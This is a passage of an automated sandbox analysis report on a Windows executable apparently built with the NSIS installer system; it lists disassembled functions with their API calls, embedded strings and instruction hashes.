                                                  • GetClientRect.USER32(?,?), ref: 004055BA
                                                  • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                                  • ShowWindow.USER32(?,00000008), ref: 0040565D
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                                    • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404545), ref: 00404370
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004056E4
                                                  • ShowWindow.USER32(00000000), ref: 00405707
                                                  • ShowWindow.USER32(?,00000008), ref: 0040570E
                                                  • ShowWindow.USER32(00000008), ref: 00405754
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                                  • CreatePopupMenu.USER32 ref: 00405799
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                                  • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                                  • OpenClipboard.USER32(00000000), ref: 00405833
                                                  • EmptyClipboard.USER32 ref: 00405839
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                                  • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                                  • CloseClipboard.USER32 ref: 0040588A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID:
                                                  • API String ID: 590372296-0
                                                  • Opcode ID: 5446ea96ddb436275efc3b28b3f9a19d11684790575015aa8393a95bc5bcfc0a
                                                  • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                                  • Opcode Fuzzy Hash: 5446ea96ddb436275efc3b28b3f9a19d11684790575015aa8393a95bc5bcfc0a
                                                  • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                                  APIs
                                                    • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                                    • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                                  • lstrcatA.KERNEL32(00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410,00436400,?,00435000,0000000A,0000000C), ref: 00403B11
                                                  • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,00435400,00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410), ref: 00403B86
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                                  • GetFileAttributesA.KERNEL32(0042DFC0,?,00435000,0000000A,0000000C), ref: 00403BA4
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403BED
                                                    • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                                  • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                                  • ShowWindow.USER32(00000005,00000000,?,00435000,0000000A,0000000C), ref: 00403CAD
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                                  • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                                  • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-2904746566
                                                  • Opcode ID: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                                  • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                                  • Opcode Fuzzy Hash: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                                  • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                                  • GetSysColor.USER32(?), ref: 00404566
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                                  • lstrlenA.KERNEL32(?), ref: 00404587
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                                  • SendMessageA.USER32(00000000), ref: 00404610
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                                  • SetCursor.USER32(00000000), ref: 00404693
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                                  • SetCursor.USER32(00000000), ref: 004046AC
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: N$cD@
                                                  • API String ID: 3103080414-2800326580
                                                  • Opcode ID: 75ce07d81b87f19cb41c34616794e8af2c5473200a6a9bd430623a0a6f6a9a22
                                                  • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                                  • Opcode Fuzzy Hash: 75ce07d81b87f19cb41c34616794e8af2c5473200a6a9bd430623a0a6f6a9a22
                                                  • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                                  • ShowWindow.USER32(00000000,?,?,00000003,?,FFFFFC1A), ref: 00404108
                                                  • EnableWindow.USER32(?), ref: 0040411A
                                                  • EnableWindow.USER32(?,?), ref: 00404135
                                                  • GetSystemMenu.USER32(?,?,0000F060,00000001,?,?,?,?,?,00000003,?,FFFFFC1A), ref: 0040414B
                                                  • EnableMenuItem.USER32(00000000), ref: 00404152
                                                  • SendMessageA.USER32(?,000000F4,?,00000001), ref: 0040416A
                                                  • SendMessageA.USER32(?,00000401,00000002), ref: 0040417D
                                                  • lstrlenA.KERNEL32 ref: 004041A7
                                                  • SetWindowTextA.USER32 ref: 004041B6
                                                  • DestroyWindow.USER32(?,?,?,?,00000000), ref: 004041FE
                                                  • CreateDialogParamA.USER32(?), ref: 00404232
                                                    • Part of subcall function 0040432D: SetDlgItemTextA.USER32(?,?,00000000), ref: 00404347
                                                  • GetDlgItem.USER32(?,000003FA), ref: 0040425B
                                                  • GetWindowRect.USER32(00000000), ref: 00404262
                                                  • ScreenToClient.USER32(?,?), ref: 0040426E
                                                  • SetWindowPos.USER32(?,?,?,?,?,00000015,?,?,?,000003FA,?,00000000,00000006,?), ref: 00404287
                                                    • Part of subcall function 00401389: MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                    • Part of subcall function 00401389: SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  • ShowWindow.USER32(00000008,?,?,?,?,?,?,?,00000015,?,?,?,000003FA,?,00000000,00000006), ref: 004042A6
                                                    • Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                                  • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageSend$EnableShow$MenuText$ClientCreateDestroyDialogParamRectScreenSystemlstrlen
                                                  • String ID:
                                                  • API String ID: 2455617345-0
                                                  • Opcode ID: 846ef0a16da82fb72dcc369e0bcd13bf655e9269ee6fb99affdbd61b3a76df5f
                                                  • Instruction ID: 17cfa9595181ccc4bc0251f22000ce502e63d694493c87bc0f861762768a06eb
                                                  • Opcode Fuzzy Hash: 846ef0a16da82fb72dcc369e0bcd13bf655e9269ee6fb99affdbd61b3a76df5f
                                                  • Instruction Fuzzy Hash: 9951B4B1200305EFD7216F51EE45E2A37B8FB94345B90053EF682B11B1CB799852DB2D
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                                  • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                                  • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                                  • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                                  • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                                    • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                                    • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                                  • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                                  • wsprintfA.USER32 ref: 00405F6B
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                                  • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406054
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                                    • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                                    • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                                  • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                                  • Opcode Fuzzy Hash: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                                  • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                                  • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                                  • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                                  • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                                    • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                                    • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                                    • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                                    • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                                    • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                                  • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                                    • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                                    • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                                    • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A
                                                  • API String ID: 2624150263-3554254475
                                                  • Opcode ID: 9d37722e02853d44da5e9115b2c3eafaccc869e0b6c7a3f858c5b4d6c4529409
                                                  • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                                  • Opcode Fuzzy Hash: 9d37722e02853d44da5e9115b2c3eafaccc869e0b6c7a3f858c5b4d6c4529409
                                                  • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402F42
                                                  • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                                    • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                                    • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                                  • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                                  • GlobalAlloc.KERNEL32(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                                  Strings
                                                  • Error launching installer, xrefs: 00402F81
                                                  • soft, xrefs: 0040301F
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                                  • Null, xrefs: 00403028
                                                  • 8TA, xrefs: 00402FBF
                                                  • Inst, xrefs: 00403016
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: 8TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-1977864323
                                                  • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                                  • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                                  • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                                  • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
                                                  • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,00429C68,00000000,00405409,00429C68,00000000,00000000), ref: 00406468
                                                  • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064C7
                                                  • CoTaskMemFree.OLE32(00000000,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064D0
                                                  • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064F4
                                                  • lstrlenA.KERNEL32(0042DFC0,?,00429C68,00000000,00405409,00429C68,00000000,00000000,?,763F23A0), ref: 00406546
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-730719616
                                                  • Opcode ID: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                                  • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                                  • Opcode Fuzzy Hash: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                                  • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                                  • GetSysColor.USER32(00000000), ref: 004043EF
                                                  • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                                  • SetBkMode.GDI32(?,?), ref: 00404407
                                                  • GetSysColor.USER32(?), ref: 0040441A
                                                  • SetBkColor.GDI32(?,?), ref: 0040442A
                                                  • DeleteObject.GDI32(?), ref: 00404444
                                                  • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                  • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                                  • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                  • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                                  APIs
                                                  • lstrlenA.KERNEL32(00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                                  • lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                                  • lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,763F23A0), ref: 0040542D
                                                  • SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
